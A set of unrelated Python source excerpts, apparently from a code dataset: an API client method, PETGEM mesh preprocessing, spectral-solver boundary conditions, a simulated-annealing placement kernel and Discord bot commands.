return self.get_user_information_with_http_info(username, **kwargs) # noqa: E501
else:
(data) = self.get_user_information_with_http_info(username, **kwargs) # noqa: E501
return data
def get_user_information_with_http_info(self, username, **kwargs): # noqa: E501
"""get_user_information # noqa: E501
Get user information for the specified user. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_user_information_with_http_info(username, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str username: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['username'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_user_information" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'username' is set
if ('username' not in params or
params['username'] is None):
raise ValueError("Missing the required parameter `username` when calling `get_user_information`") # noqa: E501
collection_formats = {}
path_params = {}
if 'username' in params:
path_params['username'] = params['username'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/v1/users/{username}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_starred_repos(self, **kwargs): # noqa: E501
"""list_starred_repos # noqa: | |
<reponame>ocastilloreyes/petgem<gh_stars>10-100
#!/usr/bin/env python3
# Author: <NAME>
# Contact: <EMAIL>
"""Define data preprocessing operations for **PETGEM**."""
# ---------------------------------------------------------------
# Load python modules
# ---------------------------------------------------------------
import numpy as np
import h5py
import meshio
from scipy.spatial import Delaunay
from petsc4py import PETSc
# ---------------------------------------------------------------
# Load petgem modules (BSC)
# ---------------------------------------------------------------
from .common import Print, Timers, measure_all_class_methods
from .parallel import MPIEnvironment, createSequentialDenseMatrixWithArray
from .parallel import writeParallelDenseMatrix, createSequentialVectorWithArray
from .parallel import writePetscVector
from .mesh import computeEdges, computeBoundaryEdges, computeFacesEdges
from .mesh import computeFaces, computeBoundaryFaces
from .mesh import computeBoundaryElements, computeBoundaries, computeFacePlane
from .hvfem import computeConnectivityDOFS
# ###############################################################
# ################ CLASSES DEFINITION ##################
# ###############################################################
@measure_all_class_methods
class Preprocessing():
"""Class for preprocessing."""
def __init__(self):
"""Initialization of a preprocessing class."""
return
def run(self, inputSetup):
"""Run a preprocessing task.
:param obj inputSetup: inputSetup object.
:return: None
"""
# ---------------------------------------------------------------
# Obtain the MPI environment
# ---------------------------------------------------------------
parEnv = MPIEnvironment()
# Start timer
Timers()["Preprocessing"].start()
# ---------------------------------------------------------------
# Preprocessing (sequential task)
# ---------------------------------------------------------------
if( parEnv.rank == 0 ):
# Parameters shortcut (for code legibility)
model = inputSetup.model
run = inputSetup.run
output = inputSetup.output
out_dir = output.get('directory_scratch')
# Compute number of dofs per element
basis_order = run.get('nord')
num_dof_in_element = np.int(basis_order*(basis_order+2)*(basis_order+3)/2)
if (model.get('mode') == 'csem'):
mode = 'csem'
elif (model.get('mode') == 'mt'):
mode = 'mt'
# Get data model
data_model = model.get(mode)
# ---------------------------------------------------------------
# Import mesh file
# ---------------------------------------------------------------
mesh_file = model.get('mesh')
# Import mesh
mesh = meshio.read(mesh_file)
# Number of elements
size = mesh.cells[0][1][:].shape
nElems = size[0]
# ---------------------------------------------------------------
# Preprocessing nodal coordinates
# ---------------------------------------------------------------
Print.master(' Nodal coordinates')
# Build coordinates in PETGEM format where each row
# represent the xyz coordinates of the 4 tetrahedral element
num_dimensions = 3
num_nodes_per_element = 4
data = mesh.points[mesh.cells[0][1][:], :]
data = data.reshape(nElems, num_dimensions*num_nodes_per_element)
# Get matrix dimensions
size = data.shape
# Build PETSc structures
matrix = createSequentialDenseMatrixWithArray(size[0], size[1], data)
# Build path to save the file
out_path = out_dir + '/nodes.dat'
# Write PETGEM nodes in PETSc format
writeParallelDenseMatrix(out_path, matrix, communicator=PETSc.COMM_SELF)
# Remove temporal matrix
del matrix
# ---------------------------------------------------------------
# Preprocessing mesh connectivity
# ---------------------------------------------------------------
Print.master(' Mesh connectivity')
# Get matrix dimensions
size = mesh.cells[0][1][:].shape
# Build PETSc structures
matrix = createSequentialDenseMatrixWithArray(size[0], size[1], mesh.cells[0][1][:])
# Build path to save the file
out_path = out_dir + '/meshConnectivity.dat'
# Write PETGEM connectivity in PETSc format
writeParallelDenseMatrix(out_path, matrix, communicator=PETSc.COMM_SELF)
# Remove temporal matrix
del matrix
# ---------------------------------------------------------------
# Preprocessing edges connectivity
# ---------------------------------------------------------------
Print.master(' Edges connectivity')
# Compute edges
elemsE, edgesNodes = computeEdges(mesh.cells[0][1][:], nElems)
nEdges = edgesNodes.shape[0]
# Get matrix dimensions
size = elemsE.shape
# Build PETSc structures
matrix = createSequentialDenseMatrixWithArray(size[0], size[1], elemsE)
# Build path to save the file
out_path = out_dir + '/edges.dat'
# Write PETGEM edges in PETSc format
writeParallelDenseMatrix(out_path, matrix, communicator=PETSc.COMM_SELF)
# Remove temporal matrix
del matrix
# Reshape edgesNodes and save
num_nodes_per_edge = 2
num_edges_per_element = 6
data = np.array((edgesNodes[elemsE[:], :]), dtype=np.float)
data = data.reshape(nElems, num_nodes_per_edge*num_edges_per_element)
# Get matrix dimensions
size = data.shape
# Build PETSc structures
matrix = createSequentialDenseMatrixWithArray(size[0], size[1], data)
# Build path to save the file
out_path = out_dir + '/edgesNodes.dat'
# Write PETGEM edgesNodes in PETSc format
writeParallelDenseMatrix(out_path, matrix, communicator=PETSc.COMM_SELF)
# Remove temporal matrix
del matrix
# ---------------------------------------------------------------
# Preprocessing faces connectivity
# ---------------------------------------------------------------
Print.master(' Faces connectivity')
# Compute faces
elemsF, facesN = computeFaces(mesh.cells[0][1][:], nElems)
nFaces = facesN.shape[0]
# Get matrix dimensions
size = elemsF.shape
# Build PETSc structures
matrix = createSequentialDenseMatrixWithArray(size[0], size[1], elemsF)
# Build path to save the file
out_path = out_dir + '/faces.dat'
# Write PETGEM edges in PETSc format
writeParallelDenseMatrix(out_path, matrix, communicator=PETSc.COMM_SELF)
# Remove temporal matrix
del matrix
# ---------------------------------------------------------------
# Preprocessing faces-edges connectivity
# ---------------------------------------------------------------
Print.master(' Faces-edges connectivity')
facesE = computeFacesEdges(elemsF, elemsE, nFaces, nElems)
num_faces_per_element = 4
num_edges_per_face = 3
data = np.array((facesE[elemsF[:], :]), dtype=np.float)
data = data.reshape(nElems, num_faces_per_element*num_edges_per_face)
# Get matrix dimensions
size = data.shape
# Build PETSc structures
matrix = createSequentialDenseMatrixWithArray(size[0], size[1], data)
# Build path to save the file
out_path = out_dir + '/facesEdges.dat'
# Write PETGEM edges in PETSc format
writeParallelDenseMatrix(out_path, matrix, communicator=PETSc.COMM_SELF)
del matrix
# ---------------------------------------------------------------
# Preprocessing dofs connectivity
# ---------------------------------------------------------------
Print.master(' DOFs connectivity')
# Compute degrees of freedom connectivity
basis_order = run.get('nord')
dofs, dof_edges, dof_faces, _, total_num_dofs = computeConnectivityDOFS(elemsE,elemsF,basis_order)
# Get matrix dimensions
size = dofs.shape
# Build PETSc structures
matrix = createSequentialDenseMatrixWithArray(size[0], size[1], dofs)
# Build path to save the file
out_path = out_dir + '/dofs.dat'
# Write PETGEM edges in PETSc format
writeParallelDenseMatrix(out_path, matrix, communicator=PETSc.COMM_SELF)
del matrix
# ---------------------------------------------------------------
# Preprocessing sigma model
# ---------------------------------------------------------------
Print.master(' Conductivity model')
i_model = data_model.get('sigma')
if (run.get('conductivity_from_file')):
# Open sigma file
sigma_file = i_model.get('file')
fileID = h5py.File(sigma_file, 'r')
# Read sigma file
conductivityModel = fileID.get('data')[()]
else:
# Get physical groups
elemsS = mesh.cell_data['gmsh:physical'][0]
elemsS -= np.int(1) # 0-based indexing
# Get horizontal sigma
horizontal_sigma = i_model.get('horizontal')
vertical_sigma = i_model.get('vertical')
# Allocate conductivity array
conductivityModel = np.zeros((nElems, 2), dtype=np.float)
for i in np.arange(nElems):
# Set horizontal sigma
conductivityModel[i, 0] = horizontal_sigma[np.int(elemsS[i])]
# Set vertical sigma
conductivityModel[i, 1] = vertical_sigma[np.int(elemsS[i])]
# Get matrix dimensions
size = conductivityModel.shape
# Build PETSc structures
matrix = createSequentialDenseMatrixWithArray(size[0], size[1], conductivityModel)
# Build path to save the file
out_path = out_dir + '/conductivityModel.dat'
# Write PETGEM edges in PETSc format
writeParallelDenseMatrix(out_path, matrix, communicator=PETSc.COMM_SELF)
del matrix
# ---------------------------------------------------------------
# Preprocessing boundaries
# ---------------------------------------------------------------
Print.master(' Boundaries')
# Compute boundary faces
bFacesN, bFaces, nbFaces = computeBoundaryFaces(elemsF, facesN)
# Build array with boundary dofs for csem mode (dirichlet BC)
if (mode == 'csem'):
# Compute boundary edges
bEdges = computeBoundaryEdges(edgesNodes, bFacesN)
# Compute dofs on boundaries
_, indx_boundary_dofs = computeBoundaries(dofs, dof_edges, dof_faces, bEdges, bFaces, basis_order);
# Build PETSc structures
vector = createSequentialVectorWithArray(indx_boundary_dofs)
# Build path to save the file
out_path = out_dir + '/boundaries.dat'
# Write PETGEM nodes in PETSc format
writePetscVector(out_path, vector, communicator=PETSc.COMM_SELF)
del vector
elif (mode == 'mt'):
# Compute to what plane the boundary face belongs
planeFace = computeFacePlane(mesh.points, bFaces, bFacesN)
# Compute boundary elements
bElems, numbElems = computeBoundaryElements(elemsF, bFaces, nFaces)
if (nbFaces != numbElems):
Print.master(' Number of boundary faces is not consistent.')
exit(-1)
# Allocate
data_boundaries = np.zeros((nbFaces, 53+num_dof_in_element), dtype=np.float)
# Fill tmp matrix with data for boundary faces
for i in np.arange(nbFaces):
# Get index of tetrahedral element (boundary element)
iEle = bElems[i]
# Get dofs of element container
dofsElement = dofs[iEle, :]
# Get indexes of nodes for i-boundary element and insert
nodesBoundaryElement = mesh.cells[0][1][iEle,:]
data_boundaries[i, 0:4] = nodesBoundaryElement
# Get nodes coordinates for i-boundary element and insert
coordEle = mesh.points[nodesBoundaryElement, :]
coordEle = coordEle.flatten()
data_boundaries[i, 4:16] = coordEle
# Get indexes of faces for i-boundary element and insert
facesBoundaryElement = elemsF[iEle, :]
data_boundaries[i, 16:20] = facesBoundaryElement
# Get edges indexes for faces in i-boundary element and insert
edgesBoundaryFace = facesE[facesBoundaryElement, :]
edgesBoundaryFace = edgesBoundaryFace.flatten()
data_boundaries[i, 20:32] = edgesBoundaryFace
# Get indexes of edges for i-boundary and insert
edgesBoundaryElement = elemsE[iEle, :]
data_boundaries[i, 32:38] = edgesBoundaryElement
# Get node indexes for edges in i-boundary and insert
edgesNodesBoundaryElement = edgesNodes[edgesBoundaryElement, :]
edgesNodesBoundaryElement = edgesNodesBoundaryElement.flatten()
data_boundaries[i, 38:50] = edgesNodesBoundaryElement
# Get plane face
ifacetype = planeFace[i]
data_boundaries[i, 50] = ifacetype
# Get global face index
localFaceIndex = bFaces[i]
data_boundaries[i, 51] = localFaceIndex
# Get sigma value
sigmaEle = conductivityModel[iEle, 0]
data_boundaries[i, 52] = sigmaEle
# Get dofs for boundary element and insert
dofsBoundaryElement = dofsElement
data_boundaries[i, 53::] = dofsBoundaryElement
# Get matrix dimensions
size = data_boundaries.shape
# Build PETSc structures
matrix = createSequentialDenseMatrixWithArray(size[0], size[1], data_boundaries)
# Build path to save the file
out_path = out_dir + '/boundaryElements.dat'
# Write PETGEM receivers in PETSc format
writeParallelDenseMatrix(out_path, matrix, communicator=PETSc.COMM_SELF)
del matrix
del data_boundaries
# ---------------------------------------------------------------
# Preprocessing receivers
# ---------------------------------------------------------------
Print.master(' Receivers')
# Open receivers_file
receivers_file = model.get('receivers')
fileID = h5py.File(receivers_file, 'r')
# Read receivers
receivers = fileID.get('data')[()]
# Number of receivers
if receivers.ndim == 1:
nReceivers = 1
else:
dim = receivers.shape
nReceivers = dim[0]
# Find out which tetrahedral element source point is in (only for csem mode)
if (mode == 'csem'):
# Allocate vector to save source data
data_source = np.zeros(50+num_dof_in_element, dtype=np.float)
i_model = data_model.get('source')
# Get source position
i_source_position = np.asarray(i_model.get('position'), dtype=np.float)
# Build Delaunay triangulation with nodes
tri = Delaunay(mesh.points)
| |
r"""@package motsfinder.ndsolve.bcs
Classes for imposing boundary conditions.
"""
from __future__ import print_function
from builtins import range
import numpy as np
from mpmath import mp
from ..utils import isiterable, lmap
from .common import _make_callable
__all__ = [
"DirichletCondition",
"NeumannCondition",
"RobinCondition",
]
class NDSolveError(Exception):
r"""Raised for problems of the numerical task (like ill-conditioned
boundary conditions)."""
pass
class RobinCondition(object):
r"""General Robin-type boundary condition.
This class represents general Dirichlet, Neumann, or mixed (Robin) type
boundary conditions suitable for 1D and 2D problems.
After you have constructed such a condition object, it is used as an
argument for the spectral solver (ndsolve() or NDSolver) in order to be
imposed in the resulting matrix equation.
"""
def __init__(self, x, alpha, beta, value, corners=True, add_rows=False):
r"""Define the boundary condition.
The general form of this boundary condition is \f[
\alpha(x) u(x) + \beta(x) \partial_\nu u(x) = g(x),
\f]
where \f$ x \f$ is specified by the `x` argument (see below) and
\f$ g(x) \f$ is given by `value`. The derivative of `u` is taken to be
perpendicular to the direction of the line specified by `x`, i.e. it
will be the outward pointing normal at the upper boundary and inward
pointing normal at the lower boundary of the respective dimension.
In 1D, we simply have \f$ \partial_\nu u(x) = u'(x) \f$.
For a pure Dirichlet condition, set ``alpha=1, beta=0`` and for a pure
Neumann condition ``alpha=0, beta=1``.
@param x
(float or tuple/list)
Value at which to impose the condition. For 1D problems, this
should simply be the `x`-value at which to impose the condition.
For 2D problems, it should be a tuple/list specifying the
`x=const` or `y=const` line to impose the condition at. For
example, to define the line `x=5`, this argument should be set to
`x=(5.0, None)`.
@param alpha
(float or callable)
Coefficient of the 'Dirichlet' part of the condition (see above).
@param beta
(float or callable)
Coefficient of the 'Neumann' part of the condition (see above).
@param value
(float or callable)
Value of the condition (see above).
@param corners
(boolean, optional)
Only relevant in 2D. If `True` (default), apply the condition at
all collocation points along the specified axis including the
boundary ones. If `False`, the boundary points are excluded. This
may be important to make the resulting matrix equation a full-rank
equation, since imposing multiple conditions at the same points
(e.g. the corners) may make the matrix singular.
@param add_rows
(boolean, optional)
Whether to add or replace rows in the matrix and the inhomogeneity
vector to impose the condition. Adding rows will create a
non-square matrix, i.e. the system may become overdetermined and
must be solved using e.g. a least squares method such as
`scipy.lstsq`. Default is `False`, i.e. to replace rows, which is
what you should do to get a determined system of equations.
"""
## Where to impose the condition
self._x = x
## Callable or value multiplying the function
self._alpha = alpha
## Callable or value multiplying the function's first derivative
self._beta = beta
## Callable or value the function + derivative (as specified by
## `alpha` and `beta`) should attain.
self._value = value
## Whether to include the corners/ends for the 2D case.
self._corners = corners
## Whether to add more equations or replace existing ones.
self._add_rows = add_rows
if isiterable(x) and len(x) == 1:
x = x[0]
if isiterable(x):
self._dim = len(x)
if x.count(None) != self._dim - 1:
raise ValueError("Condition must be imposed along one axis.")
self._idx = [i for i, p in enumerate(x) if p is not None][0]
else:
if not corners:
raise ValueError("Corners can't be skipped in 1D.")
## Auto-determined dimension of the problem
self._dim = 1
## Axis along which to impose the condition
self._idx = 0
def impose(self, basis, L, f, blocked_indices, L_done=False, f_done=False,
use_mp=False):
r"""Impose the condition by modifying the operator and inhomogeneity.
This should be called only during the solving process when the
operator matrix `L` and inhomogeneity vector `f` have been built. The
caller should supply the indices of rows (via `blocked_indices`) on
which previous conditions have been placed to avoid overwriting them
with the new conditions. The indices used here will be added to this
list (i.e. the caller only needs to repeatedly supply this list,
starting with an empty one).
@param basis
Spectral basis used during solving.
@param L
Fully populated operator matrix.
@param f
Inhomogeneity vector.
@param blocked_indices
List which is updated by this method to store which equations have
been replaced (in order not to replace a condition in later
calls).
@param L_done
Whether the operator matrix `L` has already been processed and
should be left untouched. May be useful if caching of matrices
with conditions already imposed is done, which may speed up
computation significantly.
@param f_done
Whether the inhomogeneity has already been processed and should be
left untouched. Might be useful when re-using the same
inhomogeneity (and same basis) to solve the same equation with
different boundary conditions.
@param use_mp
Whether to use arbitrary precision math operations (`True`) or
faster floating point precision operations (`False`, default).
"""
if L_done and f_done:
return L, f
alpha = _make_callable(self._alpha, use_mp=use_mp)
beta = _make_callable(self._beta, use_mp=use_mp)
value = _make_callable(self._value, use_mp=use_mp)
num = basis.num
idx = range(num)
zero_row = mp.zeros(1, num) if use_mp else np.zeros(num)
diff = self._idx + 1
rows_to_append = []
vals_to_append = []
for i, x in self._get_points(basis):
i = self._find_free_index(i, num-1, blocked_indices)
if i is not None:
blocked_indices.append(i)
x_phys = basis.transform(x, back=False)
a = alpha(x_phys)
b = beta(x_phys)
v = value(x_phys)
if a == b == 0:
continue
if not L_done:
Cx = DCx = zero_row
if a != 0:
Cx = basis.evaluate_all_at(x, 0)
if b != 0:
if self._dim > 2:
raise NotImplementedError("Neumann or mixed conditions not "
"implemented for dim > 2.")
DCx = basis.evaluate_all_at(x, diff)
# NOTE: Originally, we had sparse indices (e.g. for basis functions
# left out from the set). This led to high complexity in
# index-types, i.e. the consecutive running indices vs.
# the subscript of the actual basis function. This might
# be required if we add further functionality to the
# system. At this point, one remainder is that the
# indices in `idx` could be sparse, whereas `j` can't.
row = [a*Cx[j] + b*DCx[j] for j in range(len(idx))]
if not any(row):
raise NDSolveError("Boundary condition numerically ill-conditioned. "
"The condition might already be satisfied by the "
"chosen basis or alpha = beta = 0.")
if i is None:
rows_to_append.append(row)
else:
self._replace_row(basis.ctx, L, i, row)
if not f_done:
if i is None:
vals_to_append.append([v])
else:
f[i] = v
if rows_to_append:
L = self._append_rows(L, rows_to_append)
if vals_to_append:
f = self._append_rows(f, vals_to_append)
return L, f
def _replace_row(self, ctx, mat, n, row):
r"""Replace a row of a matrix by a different row.
This is a convenience function that handles the case of a NumPy matrix
and that of an `mpmath` matrix.
@param ctx
`mp` or `fp`, the mpmath context to use if not a NumPy matrix.
@param mat
The NumPy or mpmath matrix to replace a row in.
@param n
The row index of the row to replace.
@param row
The new data to write into the row. May be a `list`.
"""
if isinstance(mat, np.ndarray):
mat[n,:] = lmap(float, row)
else:
mat[n,:] = ctx.matrix([row])
def _append_rows(self, mat, rows):
r"""Add rows to a NumPy or mpmath matrix.
@param mat
NumPy or mpmath matrix to add the rows to.
@param rows
List of rows, each being an iterable containing the respective
row's values.
"""
if isinstance(mat, np.ndarray):
mat = np.append(mat, [lmap(float, r) for r in rows], axis=0)
elif isinstance(mat, list):
if len(rows[0]) != 1:
raise TypeError("Can only append 1D column to list.")
mat.extend(r[0] for r in rows)
else:
mat = mp.matrix(mat.tolist() + rows)
return mat
def _find_free_index(self, i, max_i, blocked):
r"""Return an index of a row we should replace next.
This is called after the row to | |
"""A Python implementation of the Simulated Annealing kernel."""
from six import iteritems
import math
import time
import importlib
from rig.place_and_route.place.utils import \
add_resources, subtract_resources, overallocated
import warnings
class PythonKernel(object):
"""An implementation of the Simulated Annealing placement algorithm kernel
written in Python.
This implementation is not optimised for runtime but should produce good
quality, correct results on any platform, albeit slowly.
This kernel will display a warning/hint if placement is taking a long time
suggesting installing ``rig_c_sa`` to enable use of the faster
:py:class:`~rig.place_and_route.place.place.sa.c_kernel.CKernel`. To
disable this warning, the kernel takes an optional ``no_warn`` argument
which, when True, disables the warning.
"""
"""Display a warning/hint to install rig_c_sa if placement takes longer
than this many seconds.
"""
WARN_TIME = 2.0 * 60.0
def __init__(self, vertices_resources, movable_vertices, fixed_vertices,
initial_placements, nets, machine, random, no_warn=False):
self.vertices_resources = vertices_resources
self.movable_vertices = list(movable_vertices)
self.fixed_vertices = fixed_vertices
self.placements = initial_placements.copy()
self.nets = nets
self.machine = machine
self.random = random
if no_warn:
self.start_time = None
else:
self.start_time = time.time()
self.has_wrap_around_links = self.machine.has_wrap_around_links()
# Location-to-Vertices: A lookup {(x, y): [vertex, ...], ...} giving
# the set of vertices on a given chip. Chips which are not in the
# machine are excluded from this lookup.
self.l2v = {xy: [] for xy in self.machine}
for vertex, location in iteritems(self.placements):
self.l2v[location].append(vertex)
# Vertices-to-Nets: A lookup {vertex: [Net, ...], ...}, gives a list of
# nets of which the given vertex is a member.
self.v2n = {v: [] for v in self.vertices_resources}
for net in nets:
for v in net:
if net not in self.v2n[v]:
self.v2n[v].append(net)
def run_steps(self, num_steps, distance_limit, temperature):
# If the placement runs for a long time, hint that the C-based placer
# is much faster.
if (self.start_time is not None and
time.time() - self.start_time > self.WARN_TIME):
# Only show the warning/hint if the C Kernel is not installed.
try:
# NB: This import is performed using import lib rather than an
# import statement to enable easier testing since this function
# call can be trivially mocked out.
importlib.import_module(
"rig.place_and_route.place.sa.c_kernel")
except ImportError:
warnings.warn(
"It appears you are placing a large graph using the "
"slow Python-based simulated annealing kernel. "
"Installing the rig_c_sa package may result in a 50-150x "
"speedup without any change to your code.",
stacklevel=3)
# Prevent future warnings
self.start_time = None
num_accepted = 0
deltas = []
for _ in range(num_steps):
swapped, delta = _step(self.movable_vertices,
distance_limit, temperature,
self.placements, self.l2v, self.v2n,
self.vertices_resources,
self.fixed_vertices,
self.machine,
self.has_wrap_around_links,
self.random)
num_accepted += 1 if swapped else 0
deltas.append(delta)
mean = sum(deltas) / float(len(deltas))
std = math.sqrt(sum((v-mean)**2 for v in deltas) / len(deltas))
cost = sum((_net_cost(net, self.placements, self.has_wrap_around_links,
self.machine)
for net in self.nets), 0.0)
return num_accepted, cost, std
def get_placements(self):
return self.placements
def _net_cost(net, placements, has_wrap_around_links, machine):
"""Get the cost of a given net.
This function, in principle at least, should estimate the total network
resources consumed by the given net. In practice this estimate is based on
the size of the bounding-box of the net (i.e. HPWL). This should be
improved at some later time to better account for the effects of large
fan-outs.
Parameters
----------
net : :py:class:`rig.netlist.Net`
placements : {vertex: (x, y), ...}
has_wrap_around_links : bool
machine : :py:class:`rig.place_and_route.Machine`
Returns
-------
float
"""
# This function is by far the hottest code in the entire algorithm, as a
# result, small performance improvements in here can have significant
# impact on the runtime of the overall algorithm. As an unfortunate side
# effect, this code is rather ugly since many higher-level constructs (e.g.
# min/max) are outrageously slow.
# XXX: This does not account for the hexagonal properties of the SpiNNaker
# topology.
if has_wrap_around_links:
# When wrap-around links exist, we find the minimal bounding box and
# return the HPWL weighted by the net weight. To do this the largest
# gap between any pair of vertices is found::
#
# | x x x |
# ^-------------^
# max gap
#
# The minimal bounding box then goes the other way around::
#
# | x x x |
# ----------^ ^---
# First we collect the x and y coordinates of all vertices in the net
# into a pair of (sorted) lists, xs and ys.
x, y = placements[net.source]
num_vertices = len(net.sinks) + 1
xs = [x] * num_vertices
ys = [y] * num_vertices
i = 1
for v in net.sinks:
x, y = placements[v]
xs[i] = x
ys[i] = y
i += 1
xs.sort()
ys.sort()
# The minimal bounding box is then found as above.
x_max_delta = 0
last_x = xs[-1] - machine.width
for x in xs:
delta = x - last_x
last_x = x
if delta > x_max_delta:
x_max_delta = delta
y_max_delta = 0
last_y = ys[-1] - machine.height
for y in ys:
delta = y - last_y
last_y = y
if delta > y_max_delta:
y_max_delta = delta
return (((machine.width - x_max_delta) +
(machine.height - y_max_delta)) *
net.weight)
else:
# When no wrap-around links, find the bounding box around the vertices
# in the net and return the HPWL weighted by the net weight.
x1, y1 = x2, y2 = placements[net.source]
for vertex in net.sinks:
x, y = placements[vertex]
x1 = x if x < x1 else x1
y1 = y if y < y1 else y1
x2 = x if x > x2 else x2
y2 = y if y > y2 else y2
return ((x2 - x1) + (y2 - y1)) * float(net.weight)
def _vertex_net_cost(vertex, v2n, placements, has_wrap_around_links, machine):
"""Get the total cost of the nets connected to the given vertex.
Parameters
----------
vertex
The vertex whose nets we're interested in.
v2n : {vertex: [:py:class:`rig.netlist.Net`, ...], ...}
placements : {vertex: (x, y), ...}
has_wrap_around_links : bool
machine : :py:class:`rig.place_and_route.Machine`
Returns
-------
float
"""
total_cost = 0.0
for net in v2n[vertex]:
total_cost += _net_cost(net, placements, has_wrap_around_links,
machine)
return total_cost
def _get_candidate_swap(resources, location,
l2v, vertices_resources, fixed_vertices, machine):
"""Given a chip location, select a set of vertices which would have to be
moved elsewhere to accommodate the arrival of the specified set of
resources.
Parameters
----------
resources : {resource: value, ...}
The amount of resources which are required at the specified location.
location : (x, y)
The coordinates of the chip where the resources are sought.
l2v : {(x, y): [vertex, ...], ...}
vertices_resources : {vertex: {resource: value, ...}, ...}
fixed_vertices : {vertex, ...}
machine : :py:class:`rig.place_and_route.Machine`
Returns
-------
[Vertex, ...] or None
If a (possibly empty) list, gives the set of vertices which should be
removed from the specified location to make room.
If None, the situation is impossible.
"""
# The resources already available at the given location
chip_resources = machine[location]
# The set of vertices at that location
vertices = l2v[location]
# The set of vertices to be moved from the location to free up the
# specified amount of resources
to_move = []
# While there's not enough free resource, remove an arbitrary (movable)
# vertex from the chip.
i = 0
while overallocated(subtract_resources(chip_resources, resources)):
if i >= len(vertices):
# Run out of vertices to remove from this chip, thus the situation
# must be impossible.
return None
elif vertices[i] in fixed_vertices:
# Can't move fixed vertices, just skip them.
i += 1
continue
else:
# Work out the cost change when we remove the specified vertex
vertex = vertices[i]
chip_resources = add_resources(chip_resources,
vertices_resources[vertex])
to_move.append(vertex)
i += 1
return to_move
def _swap(vas, vas_location, vbs, vbs_location, l2v, vertices_resources,
placements, machine):
"""Swap the positions of two sets of vertices.
Parameters
----------
vas : [vertex, ...]
A set of vertices currently at vas_location.
vas_location : (x, y)
vbs : [vertex, ...]
A set of vertices currently at vbs_location.
vbs_location : (x, y)
l2v : {(x, y): [vertex, ...], ...}
vertices_resources : {vertex: {resource: value, ...}, ...}
placements : {vertex: (x, y), ...}
machine : :py:class:`rig.place_and_route.Machine`
"""
# Get the lists of vertices | |
a Poll")
return
else:
p = await ctx.send(embed=p_embed) # Sending the Embed
await p.add_reaction("<:1_bot:957922958502952981>") # Adding 1 reaction
await p.add_reaction("<:2_bot:957922954119888917>") # Adding 2 reaction
if int(reactionc) == 3:
await p.add_reaction("<:3_bot:957922953893384192>") # Checking if number is 3, if yes add 3 reaction
elif int(reactionc) == 4: # Checking of the number is 4
await p.add_reaction("<:3_bot:957922953893384192>") # Adding 3 reaction
await p.add_reaction("<:4_bot:957922953381707797>") # Adding 4 reaction
# dm = await ctx.member.create_dm()
# await dm.send("hi this is a dear message")
# await ctx.reply("Your Poll was sent!")
await logger("f", f"Sent Poll embed to message of {ctx.author.name}#{ctx.author.discriminator}", "fun", f"Sent Poll embed to message of {ctx.author.name}#{ctx.author.discriminator}") # Logs to Log channel
@client.command(aliases=['head', 'tail', 'flip', 'flipcoin'])
async def coinflip(ctx): # Coin Flip Command
if await checkcommandchannel(ctx): return # Checks if command was executed in the Command Channel
determine_flip = [1, 0] # The options
if random.choice(determine_flip) == 1: value = "Heads"
else: value = "Tails"
embed = discord.Embed(title="Coin Flip", description=f"{ctx.author.mention} Flipped a coin!, They got **{value}**",color=embed_color)
if value == "Heads": embed.set_image(url="https://cdn.discordapp.com/attachments/951055432833695767/960211489254436935/head.png") # Setting head image
else: embed.set_image(url="https://cdn.discordapp.com/attachments/951055432833695767/960211488772083752/tail.png") # Setting tails image
embed.set_author(name=embed_header)
embed.set_footer(text=embed_footer)
await ctx.send(embed=embed)
await logger("f", f'Sent Coin Flip result to message of {ctx.author.name}#{ctx.author.discriminator}', "fun", f'Sent Coin Flip result to message of {ctx.author.name}#{ctx.author.discriminator}')
@client.command(aliases=['suggestion', 'createsuggestion']) # Suggest Command
async def suggest(ctx, *data):
if await checkcommandchannel(ctx): return # Checks if command was executed in the Command Channel
data = " ".join(data).split(' | ') # Input Splitter
"""
if data[0] == " " or "": # Checks if the first input is empty
await ctx.send("Please enter a suggestion!")
return
"""
if len(data) != 1: # Checks if there is more than one input
if not data[1].startswith("https://") or data[1].startswith("http://"): # Checks if the second input starts with https://
await ctx.send("0- Please enter a valid image link!")
return
""""
elif not data[1].endswith(".png") or not data[1].endswith(".jpg") or not data[1].endswith(".jpeg"): # Checks if the second input ends with .png, .jpg or .jpeg
await ctx.send("1- Please enter a valid image link!")
return
"""
s = data[0].replace(" nl ", " \n") # Replacing nl with \n
#The embed
cat = "s"
s_embed = discord.Embed(title=f"Suggestion", url="https://moonball.io", color=embed_color)
s_embed.add_field(name=f"Submitted by {ctx.author.name}#{ctx.author.discriminator}", value=f"Suggestion #{countadd(cat)}\n{s}", inline=True)
if len(data) > 1: s_embed.set_image(url=data[1]) # Setting image
s_embed.set_footer(text=f"{embed_footer}")
s = await suggestion_channel.send(embed=s_embed)
#Adding reactions
await s.add_reaction("<:tick_bot:953561636566863903>") # Adding tick reaction
await s.add_reaction("<:cross_bot:953561649254649866>") # Adding cross reaction
await embed_log.send(embed=s_embed) # Sending it to the Logs channel
await ctx.reply(f"Your Suggestion was sent! Check <#960203053103972403> to see how its doing!")
print("Sent {}'s suggestion to the suggestion channel!".format(ctx.author.name))
#
#
# Admin Command & Logging Function Section
#
#
# Send Command to Server
@admin.command(aliases=['cmd', 'send', 'sendcmd'])
@commands.has_permissions(administrator=True)
async def sendcmd_admin(ctx, *data): # Send Command Admin Command
data = " ".join(data).split(' | ') # Input Splitter
valid_names = ["proxy", "limbo", "parkour", "auth", "lobby", "survival", "skyblock", "duels", "bedwars", "bot"]
if data[0] not in valid_names: await ctx.send("Invalid Name"); return "invalid_name"
